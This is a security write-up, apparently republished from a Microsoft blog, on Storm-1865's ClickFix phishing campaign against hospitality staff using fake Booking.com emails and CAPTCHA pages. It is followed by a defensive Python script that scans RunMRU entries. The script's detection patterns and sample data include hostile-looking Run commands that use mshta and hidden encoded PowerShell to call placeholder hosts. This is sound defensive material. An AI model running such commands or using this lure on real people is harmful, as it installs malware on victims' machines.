Africa Flying

Hospitality Net

<text>
<p>This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe who are most likely to work with Booking.com, sending fake emails purporting to come from the agency.</p>
<p>In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.</p>
<p>Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. This blog includes additional recommendations to help users and defenders defend against these threats.</p>
<h3>Phishing campaign using the ClickFix social engineering technique</h3>
<p>In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.</p>
<p>The email includes a link, or a PDF attachment containing one, claiming to take recipients to Booking.com. Clicking the link leads to a webpage that displays a fake CAPTCHA overlaid on a subtly visible background designed to mimic a legitimate Booking.com page. This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised.</p>
<p>The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard:</p>

</text>
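The Run-dialog step described above leaves a trace defenders can check: Windows keeps a per-user history of Run commands in the RunMRU registry key. The following is an added example, not part of the original article, that triages exported RunMRU values; the binary list, the regex heuristics and the sample entries are assumptions constructed for illustration.

```python
import re

# The Run dialog (Win+R) stores each launched command as a value under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Values are
# named a, b, c, ...; the data ends in "\1"; MRUList gives newest-first order.

# Assumption: heuristic list of binaries that can fetch or execute remote code.
INTERPRETER = re.compile(
    r"(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|"
    r"bitsadmin|msiexec|rundll32|regsvr32)(?:\.exe)?\b")
# A URL or UNC path passed as an argument.
REMOTE = re.compile(r"(?i)\b(?:https?|ftp)://\S+|\\\\[\w.-]+\\\S+")
# Encoded commands, hidden windows, or in-memory evaluation.
HIDDEN = re.compile(
    r"(?i)\s-(?:e|enc|encodedcommand)\s|\s-w(?:indowstyle)?\s+h(?:idden)?\b|"
    r"\biex\b|invoke-expression|frombase64string")


def triage_runmru(values):
    """Return (name, command, reasons) for suspicious entries, newest first."""
    order = values.get("MRUList", "")
    names = list(order) + sorted(
        k for k in values if k != "MRUList" and k not in order)
    findings = []
    for name in names:
        raw = values.get(name)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        match = INTERPRETER.search(command)
        if not match:
            continue  # plain program names, folders and URLs are not flagged
        reasons = [match.group(1).lower()]
        if REMOTE.search(command):
            reasons.append("remote-reference")
        if HIDDEN.search(command):
            reasons.append("encoded-or-hidden")
        if len(reasons) > 1:  # interpreter alone (e.g. "cmd") is normal use
            findings.append((name, command, reasons))
    return findings


# Constructed RunMRU values for one user (sample data, not from the article).
SAMPLE = {
    "MRUList": "edcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver.example\\reports\\1",
    "c": "cmd\\1",
    "d": "mshta https://portal.example.invalid/verify\\1",
    "e": "powershell -w hidden -enc <BASE64-PLACEHOLDER>\\1",
}
```

A hit is a lead for investigation rather than proof of compromise, since administrators also launch these binaries from the Run dialog.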